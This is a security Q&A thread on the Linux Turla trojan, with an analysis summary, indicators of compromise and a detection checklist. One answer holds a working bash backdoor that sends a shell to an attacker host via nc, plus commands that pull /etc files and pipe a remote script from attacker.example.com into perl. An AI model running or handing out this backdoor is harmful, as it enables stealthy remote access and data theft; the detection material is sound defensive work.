# Linux-based Turla trojan

Tags: linux, malware, exploit, rootkits

There are several [articles](http://thehackernews.com/2014/12/powerful-linux-trojan-turla.html) describing the newly discovered Linux-based Turla trojan.

But basically, all these articles repeat the same, very limited, information.
Can anybody provide more details, such as:

1. How do linux machines get infected
2. Is there any privilege escalation involved, or is the whole thing only happening under the infected user (i.e. uid 1000)
3. Where does the malware code "live" on the infected machine
4. plus any other interesting details

Comment: The link mentions APT and rootkit; I'd say there is privilege escalation or social engineering but the malware definitely gets root access; and it probably lives in a compromised kernel module or even by modifying the actual kernel and embedding itself in it.

Comment: My understanding based on [this LWN comment](https://lwn.net/Articles/625200/) is that the Linux trojan is not that special. For packet injection/interception you need to be root, but then yours bets are already off.

Comment: Hey OP, can you append the question to ask for the specifics of the magic numbers that start the turla process?

Comment: @j0h - sorry, but I don't understand what you want me to ask. Feel free to suggest an edit to my question, if you think you have something interesting to ask/tell.

Comment: After some tests, research and discuss. I've posted a log edit to [my answer](http://security.stackexchange.com/a/76545/15701) today, with a **checklist** todo. Please read and comment

Comment: @AndréDaniel [APT *advanced persistent threat*](http://en.wikipedia.org/wiki/Advanced_persistent_threat) don't require *root privilege* (but let attacker, time to find a way of elevation...)

Answer (score 22, accepted):

TURLA is the final stage of a large and sophisticated family of malware.  There have been known Windows versions since at least 2010. This 40 page presentation is the most comprehensive resource I have seen, for either platform.

[TURLA - development & operations](http://www.secure.edu.pl/pdf/2014/D2_1355_C_Dereszowski.pdf)

**Some Windows Highlights**

- Stage 0: attack stage - infection vector
- Stage 1: reconnaissance stage - initial backdoor
- Stage 2: lateral movements
- Stage 3: access established stage -**TURLA deployed**
- On each stage they can quit if they lose interest in target

**Stage 0: Injection Vectors**

- [Spear Phishing](http://us.norton.com/spear-phishing-scam-not-sport/article) ([CVE-2013-3346](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3346))([CVE-2013-5065](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065))
- [Watering Holes](http://en.wikipedia.org/wiki/Watering_Hole) [Adobe Update social engineering / Java exploits ([CVE-2012-1723](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1723)), Adobe Flash exploits or Internet Explorer 6,7,8 exploits]
- Third party supplier compromise

**Stage 1: Reconaissance Stage**

- Initial backdoor - WipBot/Epic/TavDig
- WipBot is a combination of a zero-day and a CVE-2013-3346 exploit
- Exports functions with same names as TURLA. No other similarities
- Breaks debugging and most malware sandboxes
- Process hops several times, wipes its own [PE section](http://en.wikipedia.org/wiki/Portable_Executable)
- Further described in [Kaspersky Lab report](http://www.kaspersky.com/about/news/virus/2014/Unraveling-mysteries-of-Turla-cyber-espionage-campaign)

**Stage 2: Lateral Movements**

- Refine C&C
- Further penetrate network
- Utilize new backdoor
- Gets Domain Admin credentials

**Stage 3: Turla**

- Dropped on select machines for long-term compromise
- Machines can be compromised for years without detection

**Other Resources**

- The 'Penguin Turla' - [Kaspersky Lab](https://securelist.com/blog/research/67962/the-penquin-turla-2/) (linux specific details)
- Symantec Report - [Turla](http://www.symantec.com/connect/blogs/turla-spying-tool-targets-governments-and-diplomats)

**Linux Highlights**

- Turla module written in C/C++
- Based on [cd00r](http://www.phenoelit.org/stuff/cd00r.c)
- Executable is statically linked against multiple libraries
- Its functionality includes hidden network communications, arbitrary remote command execution, and remote management
- Much of its code is based on public sources
- *Cannot* be detected with netstat
- Does *not* require root access

**Linux Executable Characteristics**

- ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, stripped

**Linux Statically Linked Libraries**

- glibc2.3.2 - the GNU C library
- openssl v0.9.6 - an older OpenSSL library
- libpcap - tcpdump's network capture library

**Linux C&C Details**

- First stage C&C is hardcoded. Known activity @ news-bbc.podzone[.]org
- pDNS IP: 80.248.65.183

**Linux Startup/Execution Details**

- Process requires two parameters: ID (a numeric value used as a part of the "magic packet for authentication") and an existing network interface name
- The parameters can be inputted two different ways: from STDIN, or from dropper a launching the sample
- After the ID and interface name are entered and the process launched, the backdoor's process PID is returned

**Linux Magic Packet**

- Statically links PCAP libraries
- Gets raw socket, applies filter, captures packets
- Checks for an ACK number in the TCP header, or the second byte from the UDP packet body
- If condition is met, execution jumps to packet payload contents and creates regular socket
- Backdoor uses new socket to connect to source address of Magic Packets
- Backdoor reports its own PID and IP, waits to receive commands
- Arriving commands are executed with a "/bin/sh -c " script

**Final Notes**

Everything regarding the linux version was from the Kaspersky report. Unfortunately, detecting seems to be very difficult at this point.

*"Although Linux variants from the Turla framework were known to exist, we haven't seen any in the wild yet."* - Kaspersky Lab

Comment: thanks for the link. Unfortunately, it mostly describes infections on Windows machines. I am more interested in the Linux-infecting variant.

Comment: @MartinVegter 
 
I have edited the answer to include highlights of the only linux analysis I know to exist.

Answer (score 4):

## How this work:

#### Short intro

In order to find a way to detect them, I've strongly worked around
concept and methods.

For this, I quickly wrote a little bash script working in approx same way.

From there and with some additional knowledge about Un*x concepts,
I post my checklist which could help to find this working trojan in any system.

#### Bash re-written *Turla knock-door*

In order to understand how this work, I wrote this:

(This have to be run on target host, by some remote exploit, viruses or else.)

```
#!/bin/bash

myIpSum=${1:-1b673d1250747dd45696ff954aceed02}
myIpSalt=SaltMyIP        # Making IpSum more difficult to retrieve
printf -v bport %04X ${2:-22} # port to watch for incoming ``knock''
printf -v rport %d   ${3:-80} # port listen on attacker host

while true;do
    while IFS=': ' read seq loci locp remi remp foo;do
        [ -z "${seq//[0-9]}" ] &&
            [ "$locp" == "$bport" ] &&
            [ "$remp" != "0000" ] &&
            myIpAdd=$[16#${remi:6:2}].$[16#${remi:4:2}] &&
            myIpAdd+=.$[16#${remi:2:2}].$[16#${remi:0:2}] &&
            chksum=($(md5sum <<<$myIpSalt$myIpAdd)) &&
            [ "$chksum" == "$myIpSum" ] &&
            nc -w 10 -c "/bin/bash ${4} 2>&1" $myIpAdd $rport
    done < /proc/net/tcp
    read -t .5 -n 1
    [ "$REPLY" == "q" ] && exit 0
  done
```

This is not totally *undetectable* but...

**Features**

- Totally undetectable by using `netstat`, while staying listen for attacker's connexions.
- Use [In->Out] as [RANDOM->80] tcp ports to make connection look like any *surf* connection.
- Wait for specific IP (hashed, so not readable) on local port 22, **without** using *promiscuous* mode nor requiring *root* privilege
- Once detected an incomming connection from the specific IP (***Knock!***), this open a connection to this IP, on port 80 to look like a *surf connection* and offer a *bash*, back on this connection.

**Note:** Real *trojan* could use SSL and real HTTP Headers in order to work through proxy too!!

This accept 4 arguments:

```
$0 [myIpSum [KnockDoorPort [myPort [-i]]]]
```

- `myIpSUm` is hash of salted *attacker*'s IP. Could be rendered by using `md5sum <<<SaltMyIP192.168.1.31` (Salt could be changed in script).
- `KnockDoorPort -> bport` is any already binded port, used on target host (22 for sample if target serve SSH, but any opened port could be used)
- `myPort -> rport` is local attacker's port used for incomming connection (80 to look like outgoing http connection. Of course attacker have to be root on his host!)
- `-i` flag could be used to run `bash` interactively

#### Step of infection

0. First step is to run this script by using any remote exploit, like `shellshock` or any *buffer-overflow*.
1. Second, attacker have to know target's IP, in order to send a *`knock door`* on port 22
2. Use **from** attacker's IP (as root for listening on tcp port 80), wait for target's incomming connection.
3. You're logger in a shell on target!

   ```
   bash -c "nc -q 1 < <(sleep 1) $target 22 &>/dev/null &
        ";nc -l -p -w 3 -q 3 80 <<<"$remoteCommandLine with args"
   ```

Sample:

```
bash -c 'nc -q 1 < <(sleep 1) $target 22 &>/dev/null &
    ';nc -l -w 5 -q 3 -p 80 <<<uptime
18:43:00 up 21 days,  6:19,  1 user,  load average: 0.00, 0.01, 0.00
```

or

```
bash -c 'nc -q 1 < <(sleep 1) $target 22 &>/dev/null &
    ';nc -l -w 5 -q 3 -p 80 <<<'tar -zcC /etc passwd group 2>/dev/null' |\
    tar -ztvf -
-rw-r--r-- root/root      1222 2011-11-19 10:00 passwd
-rw-r--r-- root/root       611 2011-11-19 10:00 group
```

#### Not so easy to detect

While the script stay running on target host, and no attacker's connection are open, the running script is not visible by using `netcat`.

*`Knock`* are done once on port 22 where having a lot of connection fail is *regular*. Real [shell](/questions/tagged/shell) connection look like any outgoing http connection.

### Answers:

0. > How do linux machines get infected

   This is a *trojan*, so this question does not really a matter... (see [Shellshock](http://en.wikipedia.org/wiki/Shellshock_(software_bug)), for sample)
1. > Is there any privilege escalation involved, or is the whole thing only happening under the infected user (i.e. uid 1000)

   No, one of the goal of this is to permit attacker to search for a way of doing *privilege escalation*.
2. > Where does the malware code "live" on the infected machine

   1. Everywhere and nowhere: If you run this as an attachment, you may know where you've been stored them. If it's run from a remote exploit, they could delete the binary once run.
   2. If *Turla* is a binary (C written), thay *have* to be stored somewhere in your Un*x system, with executable flags set in order to be run. Recent filesystem do permit to delete them after running, but inode have to stay untouched!

      This could be revealed be searching for binaries that run in your system but is located in *standard `PATH`*.
   3. If *trojan* is a script, only the binary have to be linked in filesystem, so the script could be deleted or even run as *`STDIN`* and not stored at all.
      `wget -qO - http://attacker.example.com/virus.pl | perl`
3. > plus any other interesting details

   Please try my bash script...

### Checklist (added: 2015-02-04)

- Search for *forked* pids (where Parent Pid == 1)

  ```
   grep PPid:\\s1$ /proc/*/status
  ```
- Search for process that don't run binary from `PATH`

  ```
   for pid in $(ps axho pid);do
       readlink /proc/$pid/exe |
         sed 's/\/[^\/]*$//'|
         grep -q "^${PATH//:/$\|^}$" ||
           printf "%10d  %-16s  %s\n" $pid "$(
               sed 's/Name:[\t ]*//;q' /proc/$pid/status
             )" "$(
               readlink /proc/$pid/exe
             )"
     done
  ```
- Search for process running for a long time

  ```
   ps axho pid,etime,user,cmd
  ```

  ...

  ```
   ps axho pid,etimes,user,cmd | grep -v '[0-9] root ' | sort -nk2
  ```
- Script: Search for process making sort of hidding: compare `exe` and `command line`

  ```
   for pid in $( grep PPid:\\s1$ /proc/*/status | cut -d/ -f3 ) ;do
       printf "%10d  %-40s  %s\n" $pid "$(
           readlink /proc/$pid/exe)" "$(</proc/$pid/cmdline)"
     done
  ```
- Using `apparmor`, you could watch for process accessing *tcp stack* (and/or *udp stack*).
- Using `tcpdump`, there is a strong work, but an efficient solution:

  Watch for *outgoing* connection wich make any kind of request, become an answer *not necessarly* immediately after, but **send next request immediately** after recieving first answer, then don't care about last request's answer: will quit when recieving `exit` directive, saying something like `logout.`, wich could by driven as *the last http request of current session*, but close **before** recieving any *http response*.

  In fact, you have to find an outgoing connection where data exchanges don't match regular scheme of outgoing connection but an hybrid scheme of *server-start - incoming connection - server-stop*.

  Of course, this have to be *trapped* because no connection are permanently open.
- Making system calls statistics (using apparmor)

  > thanks to alphanet for this idea

  Make stats for each running process and

  Submit them to a bayesian tool to compute *regular profiles*

  In order to become alerted when a new process don't match *regular profiles* (or even when a running process change).

Comment: Of course, this sample could be *perfected* by using `openssl` instead of `netcat`... But the method would stay same.

Answer (score 1):

Given Turla is based upon *cd00r*, there should not be any privilege escalation involved.

*cd00r* runs as normal user application, starting an inetd service on some predefined ports. Thus, removing execute permissions on inted should be enough to block it.

```
sudo chmod o=r `which inetd`
```

Comment: cd00r does not listen on anything. It starts a non-promiscuous pcap and watches for packets. It will start inetd when the client connects.

Answer (score 0):

To answer "plus any other interesting details"

Related: (Agent.BTZ or Autorun, or various other names for it, SillyFDC)

- https://securelist.com/agent-btz-a-source-of-inspiration/58551/?unapproved=3338394&moderation-hash=53eeb81098d8a393de5970e4169b73b8#comment-3338394
- I made a GitHub Repo: https://github.com/loneicewolf/Agent.btz

Comment: This is a link-only answer. Please include any relevant details in your answer here

Comment: Okay, should I remove it - (and make a new one) or just edit it ? (I am very careful with down votes (I want to provide as *good* (and expected) posts here, as much as possible)

Comment: Just edit it to add the relevant details